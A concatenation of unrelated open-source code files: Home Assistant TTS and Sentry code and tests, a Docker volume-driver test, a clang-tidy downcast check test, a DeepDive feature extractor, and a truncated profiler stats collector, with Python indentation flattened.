async def async_setup_platform(p_type, p_config, disc_info=None):
"""Set up a TTS platform."""
platform = await async_prepare_setup_platform(hass, config, DOMAIN, p_type)
if platform is None:
return
try:
if hasattr(platform, "async_get_engine"):
provider = await platform.async_get_engine(hass, p_config)
else:
provider = await hass.async_add_job(platform.get_engine, hass, p_config)
if provider is None:
_LOGGER.error("Error setting up platform %s", p_type)
return
tts.async_register_engine(p_type, provider, p_config)
except Exception: # pylint: disable=broad-except
_LOGGER.exception("Error setting up platform: %s", p_type)
return
async def async_say_handle(service):
"""Service handle for say."""
entity_ids = service.data.get(ATTR_ENTITY_ID, ENTITY_MATCH_ALL)
message = service.data.get(ATTR_MESSAGE)
cache = service.data.get(ATTR_CACHE)
language = service.data.get(ATTR_LANGUAGE)
options = service.data.get(ATTR_OPTIONS)
try:
url = await tts.async_get_url(
p_type, message, cache=cache, language=language, options=options
)
except HomeAssistantError as err:
_LOGGER.error("Error on init TTS: %s", err)
return
data = {
ATTR_MEDIA_CONTENT_ID: url,
ATTR_MEDIA_CONTENT_TYPE: MEDIA_TYPE_MUSIC,
ATTR_ENTITY_ID: entity_ids,
}
await hass.services.async_call(
DOMAIN_MP, SERVICE_PLAY_MEDIA, data, blocking=True
)
service_name = p_config.get(
CONF_SERVICE_NAME, "{}_{}".format(p_type, SERVICE_SAY)
)
hass.services.async_register(
DOMAIN, service_name, async_say_handle, schema=SCHEMA_SERVICE_SAY
)
setup_tasks = [
async_setup_platform(p_type, p_config)
for p_type, p_config in config_per_platform(config, DOMAIN)
]
if setup_tasks:
await asyncio.wait(setup_tasks)
async def async_clear_cache_handle(service):
"""Handle clear cache service call."""
await tts.async_clear_cache()
hass.services.async_register(
DOMAIN,
SERVICE_CLEAR_CACHE,
async_clear_cache_handle,
schema=SCHEMA_SERVICE_CLEAR_CACHE,
)
return True
class SpeechManager:
"""Representation of a speech store."""
def __init__(self, hass):
"""Initialize a speech store."""
self.hass = hass
self.providers = {}
self.use_cache = DEFAULT_CACHE
self.cache_dir = DEFAULT_CACHE_DIR
self.time_memory = DEFAULT_TIME_MEMORY
self.base_url = None
self.file_cache = {}
self.mem_cache = {}
async def async_init_cache(self, use_cache, cache_dir, time_memory, base_url):
"""Init config folder and load file cache."""
self.use_cache = use_cache
self.time_memory = time_memory
self.base_url = base_url
def init_tts_cache_dir(cache_dir):
"""Init cache folder."""
if not os.path.isabs(cache_dir):
cache_dir = self.hass.config.path(cache_dir)
if not os.path.isdir(cache_dir):
_LOGGER.info("Create cache dir %s.", cache_dir)
os.mkdir(cache_dir)
return cache_dir
try:
self.cache_dir = await self.hass.async_add_job(
init_tts_cache_dir, cache_dir
)
except OSError as err:
raise HomeAssistantError("Can't init cache dir {}".format(err))
def get_cache_files():
"""Return a dict of given engine files."""
cache = {}
folder_data = os.listdir(self.cache_dir)
for file_data in folder_data:
record = _RE_VOICE_FILE.match(file_data)
if record:
key = KEY_PATTERN.format(
record.group(1),
record.group(2),
record.group(3),
record.group(4),
)
cache[key.lower()] = file_data.lower()
return cache
try:
cache_files = await self.hass.async_add_job(get_cache_files)
except OSError as err:
raise HomeAssistantError("Can't read cache dir {}".format(err))
if cache_files:
self.file_cache.update(cache_files)
async def async_clear_cache(self):
"""Read file cache and delete files."""
self.mem_cache = {}
def remove_files():
"""Remove files from filesystem."""
for _, filename in self.file_cache.items():
try:
os.remove(os.path.join(self.cache_dir, filename))
except OSError as err:
_LOGGER.warning("Can't remove cache file '%s': %s", filename, err)
await self.hass.async_add_job(remove_files)
self.file_cache = {}
@callback
def async_register_engine(self, engine, provider, config):
"""Register a TTS provider."""
provider.hass = self.hass
if provider.name is None:
provider.name = engine
self.providers[engine] = provider
async def async_get_url(
self, engine, message, cache=None, language=None, options=None
):
"""Get URL for play message.
This method is a coroutine.
"""
provider = self.providers[engine]
msg_hash = hashlib.sha1(bytes(message, "utf-8")).hexdigest()
use_cache = cache if cache is not None else self.use_cache
# Languages
language = language or provider.default_language
if language is None or language not in provider.supported_languages:
raise HomeAssistantError("Not supported language {0}".format(language))
# Options
if provider.default_options and options:
merged_options = provider.default_options.copy()
merged_options.update(options)
options = merged_options
options = options or provider.default_options
if options is not None:
invalid_opts = [
opt_name
for opt_name in options.keys()
if opt_name not in (provider.supported_options or [])
]
if invalid_opts:
raise HomeAssistantError(
"Invalid options found: {}".format(invalid_opts)
)
options_key = ctypes.c_size_t(hash(frozenset(options))).value
else:
options_key = "-"
key = KEY_PATTERN.format(msg_hash, language, options_key, engine).lower()
# Is speech already in memory
if key in self.mem_cache:
filename = self.mem_cache[key][MEM_CACHE_FILENAME]
# Is file store in file cache
elif use_cache and key in self.file_cache:
filename = self.file_cache[key]
self.hass.async_create_task(self.async_file_to_mem(key))
# Load speech from provider into memory
else:
filename = await self.async_get_tts_audio(
engine, key, message, use_cache, language, options
)
return "{}/api/tts_proxy/{}".format(self.base_url, filename)
async def async_get_tts_audio(self, engine, key, message, cache, language, options):
"""Receive TTS and store for view in cache.
This method is a coroutine.
"""
provider = self.providers[engine]
extension, data = await provider.async_get_tts_audio(message, language, options)
if data is None or extension is None:
raise HomeAssistantError("No TTS from {} for '{}'".format(engine, message))
# Create file infos
filename = ("{}.{}".format(key, extension)).lower()
data = self.write_tags(filename, data, provider, message, language, options)
# Save to memory
self._async_store_to_memcache(key, filename, data)
if cache:
self.hass.async_create_task(self.async_save_tts_audio(key, filename, data))
return filename
async def async_save_tts_audio(self, key, filename, data):
"""Store voice data to file and file_cache.
This method is a coroutine.
"""
voice_file = os.path.join(self.cache_dir, filename)
def save_speech():
"""Store speech to filesystem."""
with open(voice_file, "wb") as speech:
speech.write(data)
try:
await self.hass.async_add_job(save_speech)
self.file_cache[key] = filename
except OSError:
_LOGGER.error("Can't write %s", filename)
async def async_file_to_mem(self, key):
"""Load voice from file cache into memory.
This method is a coroutine.
"""
filename = self.file_cache.get(key)
if not filename:
raise HomeAssistantError("Key {} not in file cache!".format(key))
voice_file = os.path.join(self.cache_dir, filename)
def load_speech():
"""Load a speech from filesystem."""
with open(voice_file, "rb") as speech:
return speech.read()
try:
data = await self.hass.async_add_job(load_speech)
except OSError:
del self.file_cache[key]
raise HomeAssistantError("Can't read {}".format(voice_file))
self._async_store_to_memcache(key, filename, data)
@callback
def _async_store_to_memcache(self, key, filename, data):
"""Store data to memcache and set timer to remove it."""
self.mem_cache[key] = {MEM_CACHE_FILENAME: filename, MEM_CACHE_VOICE: data}
@callback
def async_remove_from_mem():
"""Cleanup memcache."""
self.mem_cache.pop(key)
self.hass.loop.call_later(self.time_memory, async_remove_from_mem)
async def async_read_tts(self, filename):
"""Read a voice file and return binary.
This method is a coroutine.
"""
record = _RE_VOICE_FILE.match(filename.lower())
if not record:
raise HomeAssistantError("Wrong tts file format!")
key = KEY_PATTERN.format(
record.group(1), record.group(2), record.group(3), record.group(4)
)
if key not in self.mem_cache:
if key not in self.file_cache:
raise HomeAssistantError("{} not in cache!".format(key))
await self.async_file_to_mem(key)
content, _ = mimetypes.guess_type(filename)
return (content, self.mem_cache[key][MEM_CACHE_VOICE])
@staticmethod
def write_tags(filename, data, provider, message, language, options):
"""Write ID3 tags to file.
Async friendly.
"""
import mutagen
data_bytes = io.BytesIO(data)
data_bytes.name = filename
data_bytes.seek(0)
album = provider.name
artist = language
if options is not None:
if options.get("voice") is not None:
artist = options.get("voice")
try:
tts_file = mutagen.File(data_bytes, easy=True)
if tts_file is not None:
tts_file["artist"] = artist
tts_file["album"] = album
tts_file["title"] = message
tts_file.save(data_bytes)
except mutagen.MutagenError as err:
_LOGGER.error("ID3 tag error: %s", err)
return data_bytes.getvalue()
class Provider:
"""Represent a single TTS provider."""
hass = None
name = None
@property
def default_language(self):
"""Return the default language."""
return None
@property
def supported_languages(self):
"""Return a list of supported languages."""
return None
@property
def supported_options(self):
"""Return a list of supported options like voice, emotionen."""
return None
@property
def default_options(self):
"""Return a dict include default options."""
return None
def get_tts_audio(self, message, language, options=None):
"""Load tts audio file from provider."""
raise NotImplementedError()
def async_get_tts_audio(self, message, language, options=None):
"""Load tts audio file from provider.
Return a tuple of file extension and data as bytes.
This method must be run in the event loop and returns a coroutine.
"""
return self.hass.async_add_job(
ft.partial(self.get_tts_audio, message, language, options=options)
)
class TextToSpeechUrlView(HomeAssistantView):
"""TTS view to get a url to a generated speech file."""
requires_auth = True
url = "/api/tts_get_url"
name = "api:tts:geturl"
def __init__(self, tts):
"""Initialize a tts view."""
self.tts = tts
async def post(self, request):
"""Generate speech and provide url."""
try:
data = await request.json()
except ValueError:
return self.json_message("Invalid JSON specified", 400)
if not data.get(ATTR_PLATFORM) and data.get(ATTR_MESSAGE):
return self.json_message("Must specify platform and message", 400)
p_type = data[ATTR_PLATFORM]
message = data[ATTR_MESSAGE]
cache = data.get(ATTR_CACHE)
language = data.get(ATTR_LANGUAGE)
options = data.get(ATTR_OPTIONS)
try:
url = await self.tts.async_get_url(
p_type, message, cache=cache, language=language, options=options
)
resp = self.json({"url": url}, 200)
except HomeAssistantError as err:
_LOGGER.error("Error on init tts: %s", err)
resp = self.json({"error": err}, 400)
return resp
class TextToSpeechView(HomeAssistantView):
"""TTS view to serve a speech audio."""
requires_auth = False
url = "/api/tts_proxy/{filename}"
name = "api:tts:speech"
def __init__(self, tts):
"""Initialize a tts view."""
self.tts = tts
async def get(self, request, filename):
"""Start a get request."""
try:
content, data = await self.tts.async_read_tts(filename)
except HomeAssistantError as err:
_LOGGER.error("Error on load tts: %s", err)
return web.Response(status=404)
return web.Response(body=data, content_type=content)
|
unknown
|
codeparrot/codeparrot-clean
| ||
"""Tests for Sentry integration."""
import logging
import pytest
from homeassistant.components.sentry import get_channel, process_before_send
from homeassistant.components.sentry.const import (
CONF_DSN,
CONF_ENVIRONMENT,
CONF_EVENT_CUSTOM_COMPONENTS,
CONF_EVENT_HANDLED,
CONF_EVENT_THIRD_PARTY_PACKAGES,
CONF_TRACING,
CONF_TRACING_SAMPLE_RATE,
DOMAIN,
)
from homeassistant.const import __version__ as current_version
from homeassistant.core import HomeAssistant
from tests.async_mock import MagicMock, Mock, patch
from tests.common import MockConfigEntry
async def test_setup_entry(hass: HomeAssistant) -> None:
"""Test integration setup from entry."""
entry = MockConfigEntry(
domain=DOMAIN,
data={CONF_DSN: "http://public@example.com/1", CONF_ENVIRONMENT: "production"},
)
entry.add_to_hass(hass)
with patch(
"homeassistant.components.sentry.AioHttpIntegration"
) as sentry_aiohttp_mock, patch(
"homeassistant.components.sentry.SqlalchemyIntegration"
) as sentry_sqlalchemy_mock, patch(
"homeassistant.components.sentry.LoggingIntegration"
) as sentry_logging_mock, patch(
"homeassistant.components.sentry.sentry_sdk"
) as sentry_mock:
assert await hass.config_entries.async_setup(entry.entry_id)
await hass.async_block_till_done()
# Test CONF_ENVIRONMENT is migrated to entry options
assert CONF_ENVIRONMENT not in entry.data
assert CONF_ENVIRONMENT in entry.options
assert entry.options[CONF_ENVIRONMENT] == "production"
assert sentry_logging_mock.call_count == 1
assert sentry_logging_mock.called_once_with(
level=logging.WARNING, event_level=logging.WARNING
)
assert sentry_aiohttp_mock.call_count == 1
assert sentry_sqlalchemy_mock.call_count == 1
assert sentry_mock.init.call_count == 1
call_args = sentry_mock.init.call_args[1]
assert set(call_args) == {
"dsn",
"environment",
"integrations",
"release",
"before_send",
}
assert call_args["dsn"] == "http://public@example.com/1"
assert call_args["environment"] == "production"
assert call_args["integrations"] == [
sentry_logging_mock.return_value,
sentry_aiohttp_mock.return_value,
sentry_sqlalchemy_mock.return_value,
]
assert call_args["release"] == current_version
assert call_args["before_send"]
async def test_setup_entry_with_tracing(hass: HomeAssistant) -> None:
"""Test integration setup from entry with tracing enabled."""
entry = MockConfigEntry(
domain=DOMAIN,
data={CONF_DSN: "http://public@example.com/1"},
options={CONF_TRACING: True, CONF_TRACING_SAMPLE_RATE: 0.5},
)
entry.add_to_hass(hass)
with patch("homeassistant.components.sentry.AioHttpIntegration"), patch(
"homeassistant.components.sentry.SqlalchemyIntegration"
), patch("homeassistant.components.sentry.LoggingIntegration"), patch(
"homeassistant.components.sentry.sentry_sdk"
) as sentry_mock:
assert await hass.config_entries.async_setup(entry.entry_id)
await hass.async_block_till_done()
call_args = sentry_mock.init.call_args[1]
assert set(call_args) == {
"dsn",
"environment",
"integrations",
"release",
"before_send",
"traces_sample_rate",
}
assert call_args["traces_sample_rate"] == 0.5
@pytest.mark.parametrize(
"version,channel",
[
("0.115.0.dev20200815", "nightly"),
("0.115.0", "stable"),
("0.115.0b4", "beta"),
("0.115.0dev0", "dev"),
],
)
async def test_get_channel(version, channel) -> None:
"""Test if channel detection works from Home Assistant version number."""
assert get_channel(version) == channel
async def test_process_before_send(hass: HomeAssistant):
"""Test regular use of the Sentry process before sending function."""
hass.config.components.add("puppies")
hass.config.components.add("a_integration")
# These should not show up in the result.
hass.config.components.add("puppies.light")
hass.config.components.add("auth")
result = process_before_send(
hass,
options={},
channel="test",
huuid="12345",
system_info={"installation_type": "pytest"},
custom_components=["ironing_robot", "fridge_opener"],
event={},
hint={},
)
assert result
assert result["tags"]
assert result["contexts"]
assert result["contexts"]
ha_context = result["contexts"]["Home Assistant"]
assert ha_context["channel"] == "test"
assert ha_context["custom_components"] == "fridge_opener\nironing_robot"
assert ha_context["integrations"] == "a_integration\npuppies"
tags = result["tags"]
assert tags["channel"] == "test"
assert tags["uuid"] == "12345"
assert tags["installation_type"] == "pytest"
user = result["user"]
assert user["id"] == "12345"
async def test_event_with_platform_context(hass: HomeAssistant):
"""Test extraction of platform context information during Sentry events."""
current_platform_mock = Mock()
current_platform_mock.get().platform_name = "hue"
current_platform_mock.get().domain = "light"
with patch(
"homeassistant.components.sentry.entity_platform.current_platform",
new=current_platform_mock,
):
result = process_before_send(
hass,
options={},
channel="test",
huuid="12345",
system_info={"installation_type": "pytest"},
custom_components=["ironing_robot"],
event={},
hint={},
)
assert result
assert result["tags"]["integration"] == "hue"
assert result["tags"]["platform"] == "light"
assert result["tags"]["custom_component"] == "no"
current_platform_mock.get().platform_name = "ironing_robot"
current_platform_mock.get().domain = "switch"
with patch(
"homeassistant.components.sentry.entity_platform.current_platform",
new=current_platform_mock,
):
result = process_before_send(
hass,
options={CONF_EVENT_CUSTOM_COMPONENTS: True},
channel="test",
huuid="12345",
system_info={"installation_type": "pytest"},
custom_components=["ironing_robot"],
event={},
hint={},
)
assert result
assert result["tags"]["integration"] == "ironing_robot"
assert result["tags"]["platform"] == "switch"
assert result["tags"]["custom_component"] == "yes"
@pytest.mark.parametrize(
"logger,tags",
[
("adguard", {"package": "adguard"}),
(
"homeassistant.components.hue.coordinator",
{"integration": "hue", "custom_component": "no"},
),
(
"homeassistant.components.hue.light",
{"integration": "hue", "platform": "light", "custom_component": "no"},
),
(
"homeassistant.components.ironing_robot.switch",
{
"integration": "ironing_robot",
"platform": "switch",
"custom_component": "yes",
},
),
(
"homeassistant.components.ironing_robot",
{"integration": "ironing_robot", "custom_component": "yes"},
),
("homeassistant.helpers.network", {"helpers": "network"}),
("tuyapi.test", {"package": "tuyapi"}),
],
)
async def test_logger_event_extraction(hass: HomeAssistant, logger, tags):
"""Test extraction of information from Sentry logger events."""
result = process_before_send(
hass,
options={
CONF_EVENT_CUSTOM_COMPONENTS: True,
CONF_EVENT_THIRD_PARTY_PACKAGES: True,
},
channel="test",
huuid="12345",
system_info={"installation_type": "pytest"},
custom_components=["ironing_robot"],
event={"logger": logger},
hint={},
)
assert result
assert result["tags"] == {
"channel": "test",
"uuid": "12345",
"installation_type": "pytest",
**tags,
}
@pytest.mark.parametrize(
"logger,options,event",
[
("adguard", {CONF_EVENT_THIRD_PARTY_PACKAGES: True}, True),
("adguard", {CONF_EVENT_THIRD_PARTY_PACKAGES: False}, False),
(
"homeassistant.components.ironing_robot.switch",
{CONF_EVENT_CUSTOM_COMPONENTS: True},
True,
),
(
"homeassistant.components.ironing_robot.switch",
{CONF_EVENT_CUSTOM_COMPONENTS: False},
False,
),
],
)
async def test_filter_log_events(hass: HomeAssistant, logger, options, event):
"""Test filtering of events based on configuration options."""
result = process_before_send(
hass,
options=options,
channel="test",
huuid="12345",
system_info={"installation_type": "pytest"},
custom_components=["ironing_robot"],
event={"logger": logger},
hint={},
)
if event:
assert result
else:
assert result is None
@pytest.mark.parametrize(
"handled,options,event",
[
("yes", {CONF_EVENT_HANDLED: True}, True),
("yes", {CONF_EVENT_HANDLED: False}, False),
("no", {CONF_EVENT_HANDLED: False}, True),
("no", {CONF_EVENT_HANDLED: True}, True),
],
)
async def test_filter_handled_events(hass: HomeAssistant, handled, options, event):
"""Tests filtering of handled events based on configuration options."""
event_mock = MagicMock()
event_mock.__iter__ = ["tags"]
event_mock.__contains__ = lambda _, val: val == "tags"
event_mock.tags = {"handled": handled}
result = process_before_send(
hass,
options=options,
channel="test",
huuid="12345",
system_info={"installation_type": "pytest"},
custom_components=[],
event=event_mock,
hint={},
)
if event:
assert result
else:
assert result is None
|
unknown
|
codeparrot/codeparrot-clean
| ||
package drivers
import (
"fmt"
"net/http"
"net/http/httptest"
"net/url"
"strings"
"testing"
"github.com/docker/go-connections/tlsconfig"
"github.com/moby/moby/v2/pkg/plugins"
)
func TestVolumeRequestError(t *testing.T) {
mux := http.NewServeMux()
server := httptest.NewServer(mux)
defer server.Close()
mux.HandleFunc("/VolumeDriver.Create", func(w http.ResponseWriter, r *http.Request) {
w.Header().Set("Content-Type", plugins.VersionMimetype)
fmt.Fprintln(w, `{"Err": "Cannot create volume"}`)
})
mux.HandleFunc("/VolumeDriver.Remove", func(w http.ResponseWriter, r *http.Request) {
w.Header().Set("Content-Type", plugins.VersionMimetype)
fmt.Fprintln(w, `{"Err": "Cannot remove volume"}`)
})
mux.HandleFunc("/VolumeDriver.Mount", func(w http.ResponseWriter, r *http.Request) {
w.Header().Set("Content-Type", plugins.VersionMimetype)
fmt.Fprintln(w, `{"Err": "Cannot mount volume"}`)
})
mux.HandleFunc("/VolumeDriver.Unmount", func(w http.ResponseWriter, r *http.Request) {
w.Header().Set("Content-Type", plugins.VersionMimetype)
fmt.Fprintln(w, `{"Err": "Cannot unmount volume"}`)
})
mux.HandleFunc("/VolumeDriver.Path", func(w http.ResponseWriter, r *http.Request) {
w.Header().Set("Content-Type", plugins.VersionMimetype)
fmt.Fprintln(w, `{"Err": "Unknown volume"}`)
})
mux.HandleFunc("/VolumeDriver.List", func(w http.ResponseWriter, r *http.Request) {
w.Header().Set("Content-Type", plugins.VersionMimetype)
fmt.Fprintln(w, `{"Err": "Cannot list volumes"}`)
})
mux.HandleFunc("/VolumeDriver.Get", func(w http.ResponseWriter, r *http.Request) {
w.Header().Set("Content-Type", plugins.VersionMimetype)
fmt.Fprintln(w, `{"Err": "Cannot get volume"}`)
})
mux.HandleFunc("/VolumeDriver.Capabilities", func(w http.ResponseWriter, r *http.Request) {
w.Header().Set("Content-Type", plugins.VersionMimetype)
http.Error(w, "error", http.StatusInternalServerError)
})
u, _ := url.Parse(server.URL)
client, err := plugins.NewClient("tcp://"+u.Host, &tlsconfig.Options{InsecureSkipVerify: true})
if err != nil {
t.Fatal(err)
}
driver := volumeDriverProxy{client}
if err = driver.Create("volume", nil); err == nil {
t.Fatal("Expected error, was nil")
}
if !strings.Contains(err.Error(), "Cannot create volume") {
t.Fatalf("Unexpected error: %v\n", err)
}
_, err = driver.Mount("volume", "123")
if err == nil {
t.Fatal("Expected error, was nil")
}
if !strings.Contains(err.Error(), "Cannot mount volume") {
t.Fatalf("Unexpected error: %v\n", err)
}
err = driver.Unmount("volume", "123")
if err == nil {
t.Fatal("Expected error, was nil")
}
if !strings.Contains(err.Error(), "Cannot unmount volume") {
t.Fatalf("Unexpected error: %v\n", err)
}
err = driver.Remove("volume")
if err == nil {
t.Fatal("Expected error, was nil")
}
if !strings.Contains(err.Error(), "Cannot remove volume") {
t.Fatalf("Unexpected error: %v\n", err)
}
_, err = driver.Path("volume")
if err == nil {
t.Fatal("Expected error, was nil")
}
if !strings.Contains(err.Error(), "Unknown volume") {
t.Fatalf("Unexpected error: %v\n", err)
}
_, err = driver.List()
if err == nil {
t.Fatal("Expected error, was nil")
}
if !strings.Contains(err.Error(), "Cannot list volumes") {
t.Fatalf("Unexpected error: %v\n", err)
}
_, err = driver.Get("volume")
if err == nil {
t.Fatal("Expected error, was nil")
}
if !strings.Contains(err.Error(), "Cannot get volume") {
t.Fatalf("Unexpected error: %v\n", err)
}
_, err = driver.Capabilities()
if err == nil {
t.Fatal(err)
}
}
|
go
|
github
|
https://github.com/moby/moby
|
daemon/volume/drivers/proxy_test.go
|
// RUN: %check_clang_tidy -check-suffixes=NSTRICT,STRICT %s cppcoreguidelines-pro-type-static-cast-downcast %t
// RUN: %check_clang_tidy -check-suffix=NSTRICT %s cppcoreguidelines-pro-type-static-cast-downcast %t -- -config="{CheckOptions: {cppcoreguidelines-pro-type-static-cast-downcast.StrictMode: false}}"
class Base {
};
class Derived : public Base {
};
class Base2 {
};
class MultiDerived : public Base, public Base2 {
};
class PolymorphicBase {
public:
virtual ~PolymorphicBase();
};
class PolymorphicDerived : public PolymorphicBase {
};
class PolymorphicMultiDerived : public Base, public PolymorphicBase {
};
void pointers() {
auto P0 = static_cast<Derived*>(new Base());
// CHECK-MESSAGES-STRICT: :[[@LINE-1]]:13: warning: do not use static_cast to downcast from a base to a derived class [cppcoreguidelines-pro-type-static-cast-downcast]
const Base* B0;
auto PC0 = static_cast<const Derived*>(B0);
// CHECK-MESSAGES-STRICT: :[[@LINE-1]]:14: warning: do not use static_cast to downcast from a base to a derived class [cppcoreguidelines-pro-type-static-cast-downcast]
auto P1 = static_cast<Base*>(new Derived()); // OK, upcast to a public base
auto P2 = static_cast<Base*>(new MultiDerived()); // OK, upcast to a public base
auto P3 = static_cast<Base2*>(new MultiDerived()); // OK, upcast to a public base
}
void pointers_polymorphic() {
auto PP0 = static_cast<PolymorphicDerived*>(new PolymorphicBase());
// CHECK-MESSAGES-NSTRICT: :[[@LINE-1]]:14: warning: do not use static_cast to downcast from a base to a derived class; use dynamic_cast instead [cppcoreguidelines-pro-type-static-cast-downcast]
// CHECK-FIXES-NSTRICT: auto PP0 = dynamic_cast<PolymorphicDerived*>(new PolymorphicBase());
const PolymorphicBase* B0;
auto PPC0 = static_cast<const PolymorphicDerived*>(B0);
// CHECK-MESSAGES-NSTRICT: :[[@LINE-1]]:15: warning: do not use static_cast to downcast from a base to a derived class; use dynamic_cast instead [cppcoreguidelines-pro-type-static-cast-downcast]
// CHECK-FIXES-NSTRICT: auto PPC0 = dynamic_cast<const PolymorphicDerived*>(B0);
auto B1 = static_cast<PolymorphicBase*>(new PolymorphicDerived()); // OK, upcast to a public base
auto B2 = static_cast<PolymorphicBase*>(new PolymorphicMultiDerived()); // OK, upcast to a public base
auto B3 = static_cast<Base*>(new PolymorphicMultiDerived()); // OK, upcast to a public base
}
void arrays() {
Base ArrayOfBase[10];
auto A0 = static_cast<Derived*>(ArrayOfBase);
// CHECK-MESSAGES-STRICT: :[[@LINE-1]]:13: warning: do not use static_cast to downcast from a base to a derived class [cppcoreguidelines-pro-type-static-cast-downcast]
}
void arrays_polymorphic() {
PolymorphicBase ArrayOfPolymorphicBase[10];
auto AP0 = static_cast<PolymorphicDerived*>(ArrayOfPolymorphicBase);
// CHECK-MESSAGES-NSTRICT: :[[@LINE-1]]:14: warning: do not use static_cast to downcast from a base to a derived class; use dynamic_cast instead
// CHECK-FIXES-NSTRICT: auto AP0 = dynamic_cast<PolymorphicDerived*>(ArrayOfPolymorphicBase);
}
void references() {
Base B0;
auto R0 = static_cast<Derived&>(B0);
// CHECK-MESSAGES-STRICT: :[[@LINE-1]]:13: warning: do not use static_cast to downcast from a base to a derived class [cppcoreguidelines-pro-type-static-cast-downcast]
Base& RefToBase = B0;
auto R1 = static_cast<Derived&>(RefToBase);
// CHECK-MESSAGES-STRICT: :[[@LINE-1]]:13: warning: do not use static_cast to downcast from a base to a derived class [cppcoreguidelines-pro-type-static-cast-downcast]
const Base& ConstRefToBase = B0;
auto RC1 = static_cast<const Derived&>(ConstRefToBase);
// CHECK-MESSAGES-STRICT: :[[@LINE-1]]:14: warning: do not use static_cast to downcast from a base to a derived class [cppcoreguidelines-pro-type-static-cast-downcast]
Derived RD1;
auto R2 = static_cast<Base&>(RD1); // OK, upcast to a public base
}
void references_polymorphic() {
PolymorphicBase B0;
auto RP0 = static_cast<PolymorphicDerived&>(B0);
// CHECK-MESSAGES-NSTRICT: :[[@LINE-1]]:14: warning: do not use static_cast to downcast from a base to a derived class; use dynamic_cast instead
// CHECK-FIXES-NSTRICT: auto RP0 = dynamic_cast<PolymorphicDerived&>(B0);
PolymorphicBase& RefToPolymorphicBase = B0;
auto RP1 = static_cast<PolymorphicDerived&>(RefToPolymorphicBase);
// CHECK-MESSAGES-NSTRICT: :[[@LINE-1]]:14: warning: do not use static_cast to downcast from a base to a derived class; use dynamic_cast instead [cppcoreguidelines-pro-type-static-cast-downcast]
// CHECK-FIXES-NSTRICT: auto RP1 = dynamic_cast<PolymorphicDerived&>(RefToPolymorphicBase);
const PolymorphicBase& ConstRefToPolymorphicBase = B0;
auto RPC2 = static_cast<const PolymorphicDerived&>(ConstRefToPolymorphicBase);
// CHECK-MESSAGES-NSTRICT: :[[@LINE-1]]:15: warning: do not use static_cast to downcast from a base to a derived class; use dynamic_cast instead [cppcoreguidelines-pro-type-static-cast-downcast]
// CHECK-FIXES-NSTRICT: auto RPC2 = dynamic_cast<const PolymorphicDerived&>(ConstRefToPolymorphicBase);
PolymorphicDerived d1;
auto RP2 = static_cast<PolymorphicBase&>(d1); // OK, upcast to a public base
}
template<class B, class D>
void templ() {
auto B0 = static_cast<B*>(new D());
}
void templ_bad_call() {
templ<Derived, Base>(); //FIXME: this should trigger a warning
}
void templ_good_call() {
templ<Base, Derived>(); // OK, upcast to a public base
}
|
cpp
|
github
|
https://github.com/llvm/llvm-project
|
clang-tools-extra/test/clang-tidy/checkers/cppcoreguidelines/pro-type-static-cast-downcast.cpp
|
#! /usr/bin/env python
import sys
import ddlib # DeepDive python utility
ARR_DELIM = '~^~'
# For each input tuple
for row in sys.stdin:
parts = row.strip().split('\t')
if len(parts) != 6:
print >>sys.stderr, 'Failed to parse row:', row
continue
# Get all fields from a row
words = parts[0].split(ARR_DELIM)
relation_id = parts[1]
p1_start, p1_length, p2_start, p2_length = [int(x) for x in parts[2:]]
# Unpack input into tuples.
span1 = ddlib.Span(begin_word_id=p1_start, length=p1_length)
span2 = ddlib.Span(begin_word_id=p2_start, length=p2_length)
# Features for this pair come in here
features = set()
# Feature 1: Bag of words between the two phrases
words_between = ddlib.tokens_between_spans(words, span1, span2)
for word in words_between.elements:
features.add("word_between=" + word)
# Feature 2: Number of words between the two phrases
# features.add("num_words_between=%s" % len(words_between.elements))
# Feature 3: Does the last word (last name) match?
# last_word_left = ddlib.materialize_span(words, span1)[-1]
# last_word_right = ddlib.materialize_span(words, span2)[-1]
# if (last_word_left == last_word_right):
# features.add("potential_last_name_match")
########################
# Improved Feature Set #
########################
# # Feature 1: Find out if a lemma of marry occurs.
# # A better feature would ensure this is on the dependency path between the two.
# words_between = ddlib.tokens_between_spans(words, span1, span2)
# lemma_between = ddlib.tokens_between_spans(obj["lemma"], span1, span2)
# married_words = ['marry', 'widow', 'wife', 'fiancee', 'spouse']
# non_married_words = ['father', 'mother', 'brother', 'sister', 'son']
# # Make sure the distance between mention pairs is not too long
# if len(words_between.elements) <= 10:
# for mw in married_words + non_married_words:
# if mw in lemma_between.elements:
# features.add("important_word=%s" % mw)
# # Feature 2: Number of words between the two phrases
# # Intuition: if they are close by, the link may be stronger.
# l = len(words_between.elements)
# if l < 5: features.add("few_words_between")
# else: features.add("many_words_between")
# # Feature 3: Does the last word (last name) match?
# last_word_left = ddlib.materialize_span(words, span1)[-1]
# last_word_right = ddlib.materialize_span(words, span2)[-1]
# if (last_word_left == last_word_right):
# features.add("potential_last_name_match")
#######################
# # Use this line if you want to print out all features extracted:
# ddlib.log(features)
for feature in features:
print str(relation_id) + '\t' + feature
|
unknown
|
codeparrot/codeparrot-clean
| ||
import collections
import marshal
import pstats
from _colorize import ANSIColors
from .collector import Collector, extract_lineno
from .constants import MICROSECONDS_PER_SECOND, PROFILING_MODE_CPU
class PstatsCollector(Collector):
def __init__(self, sample_interval_usec, *, skip_idle=False):
self.result = collections.defaultdict(
lambda: dict(total_rec_calls=0, direct_calls=0, cumulative_calls=0)
)
self.stats = {}
self.sample_interval_usec = sample_interval_usec
self.callers = collections.defaultdict(
lambda: collections.defaultdict(int)
)
self.skip_idle = skip_idle
self._seen_locations = set()
def _process_frames(self, frames, weight=1):
"""Process a single thread's frame stack."""
if not frames:
return
self._seen_locations.clear()
# Process each frame in the stack to track cumulative calls
# frame.location is int, tuple (lineno, end_lineno, col_offset, end_col_offset), or None
for frame in frames:
lineno = extract_lineno(frame.location)
location = (frame.filename, lineno, frame.funcname)
if location not in self._seen_locations:
self._seen_locations.add(location)
self.result[location]["cumulative_calls"] += weight
# The top frame gets counted as an inline call (directly executing)
top_lineno = extract_lineno(frames[0].location)
top_location = (frames[0].filename, top_lineno, frames[0].funcname)
self.result[top_location]["direct_calls"] += weight
# Track caller-callee relationships for call graph
for i in range(1, len(frames)):
callee_frame = frames[i - 1]
caller_frame = frames[i]
callee_lineno = extract_lineno(callee_frame.location)
caller_lineno = extract_lineno(caller_frame.location)
callee = (callee_frame.filename, callee_lineno, callee_frame.funcname)
caller = (caller_frame.filename, caller_lineno, caller_frame.funcname)
self.callers[callee][caller] += weight
def collect(self, stack_frames, timestamps_us=None):
weight = len(timestamps_us) if timestamps_us else 1
